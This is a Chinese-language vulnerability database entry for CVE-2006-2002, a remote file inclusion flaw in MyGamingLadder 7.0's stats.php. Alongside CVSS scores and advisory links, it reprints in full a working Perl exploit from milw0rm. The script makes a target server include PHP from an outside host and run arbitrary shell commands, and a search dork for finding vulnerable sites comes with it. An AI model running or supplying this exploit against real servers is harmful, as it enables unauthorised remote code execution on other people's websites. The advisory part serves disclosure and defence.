CVE-2006-2002
CVSS5.0
发布时间 :2006-04-25 08:50:00
修订时间 :2011-03-07 21:34:46
NMCOE    

[原文]PHP remote file inclusion vulnerability in stats.php in MyGamingLadder 7.0 allows remote attackers to execute arbitrary PHP code via a URL in the dir[base] parameter.


[CNNVD]My Gaming Ladder Stats.PHP 远程文件包含漏洞 (CNNVD-200604-465)

        MyGamingLadder 7.0中的stats.php存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于dir[base]参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2002
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2002
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-465
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1483
(UNKNOWN)  VUPEN  ADV-2006-1483
http://www.securityfocus.com/bid/17657
(UNKNOWN)  BID  17657
http://www.securityfocus.com/archive/1/archive/1/431902/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060422 Advisory: My Gaming Ladder Combo System <= 7.0 Remote File Inclusion Vulnerability.
http://www.nukedx.com/?viewdoc=28
(UNKNOWN)  MISC  http://www.nukedx.com/?viewdoc=28
http://secunia.com/advisories/19773
(VENDOR_ADVISORY)  SECUNIA  19773
http://xforce.iss.net/xforce/xfdb/25992
(UNKNOWN)  XF  mygamingladder-stats-file-inclusion(25992)
http://www.osvdb.org/24892
(UNKNOWN)  OSVDB  24892

- 漏洞信息

My Gaming Ladder Stats.PHP 远程文件包含漏洞
中危 输入验证
2006-04-25 00:00:00 2006-04-26 00:00:00
远程  
        MyGamingLadder 7.0中的stats.php存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于dir[base]参数中的URL执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1707)

My Gaming Ladder Combo System <= 7.0 Remote Code Execution Exploit (EDBID:1707)
php webapps
2006-04-22 Verified
0 nukedx
N/A [点击下载]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=28
#Usage: ladder.pl <host> <path> <cmd>
#Dork: "Ladder Scripts by http://www.mygamingladder.com" 40.500 pages.
use IO::Socket;
if(@ARGV < 3) { usage(); }
else { exploit(); }
sub header()
{
  print "\n- NukedX Security Advisory Nr.2006-28\r\n";
  print "- My Gaming Ladder Combo System <= 7.0 Remote Command Execution Exploit\r\n";
}
sub main::urlEncode {
  my ($string) = @_;
  $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
  #$string# =~ tr/.//;
  return $string;
}
sub usage() 
{
  header();
  print "- Usage: $0 <host> <path> <cmd>\r\n";
  print "- <host> -> Victim's host ex: www.victim.com\r\n";
  print "- <path> -> Path to My Gaming Ladder ex: /ladder/\r\n";
  print "- <cmd>  -> Command to execute ex: ls -la\r\n";
  print "- This exploit needs allow_url_fopen set to 1 and register_globals on\r\n";
  exit();
}
sub exploit () 
{
  #Our variables...
  $echoing  = "";
  $ldserver = $ARGV[0];
  $ldserver =~ s/(http:\/\/)//eg;
  $ldhost   = "http://".$ldserver;
  $lddir    = $ARGV[1];
  $ldport   = "80";
  $ldtar    = "stats.php?dir[func]=&dir[base]=http://www.misssera.com.tr/old/rce.txt%3F&command=";
  $ldcmd    = ""; for ($i=2; $i<=$#ARGV; $i++) {$ldcmd.="%20".urlEncode($ARGV[$i]);};
  $ldreq    = $ldhost.$lddir.$ldtar.$ldcmd;
  #Sending data...
  header();
  print "- Trying to connect: $ldserver\r\n";
  $ld = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ldserver", PeerPort => "$ldport") || die "- Connection failed...\n";
  print $ld "GET $ldreq HTTP/1.1\n";
  print $ld "Accept: */*\n";
  print $ld "Referer: $ldhost\n";
  print $ld "Accept-Language: tr\n";
  print $ld "User-Agent: NukeZilla\n";
  print $ld "Cache-Control: no-cache\n";
  print $ld "Host: $ldserver\n";
  print $ld "Connection: close\n\n";
  print "- Connected...\r\n";
  $echoing = "No";
  while ($answer = <$ld>) {
    if ($answer =~ /NukedX here/) { $echoing = "Yes"; }
    if ($answer =~ /NukedX was here/) { print "- End of results\n"; exit(); }
    if ($echoing =~ /Yes/) { 
      if ($answer =~ /NukedX here/) { print "- Command executed succesfully here is results\r\n"; }
      else { print "$answer"; }
    }
  }
  #Exploit failed...
  print "- Exploit failed\n"
}

# milw0rm.com [2006-04-22]
		

- 漏洞信息

24892
My Gaming Ladder Combo System stats.php dir[base] Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

COmbo System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to stats.php not properly sanitizing user input supplied to the 'dir[base]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-04-22 Unknow
2006-04-22 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站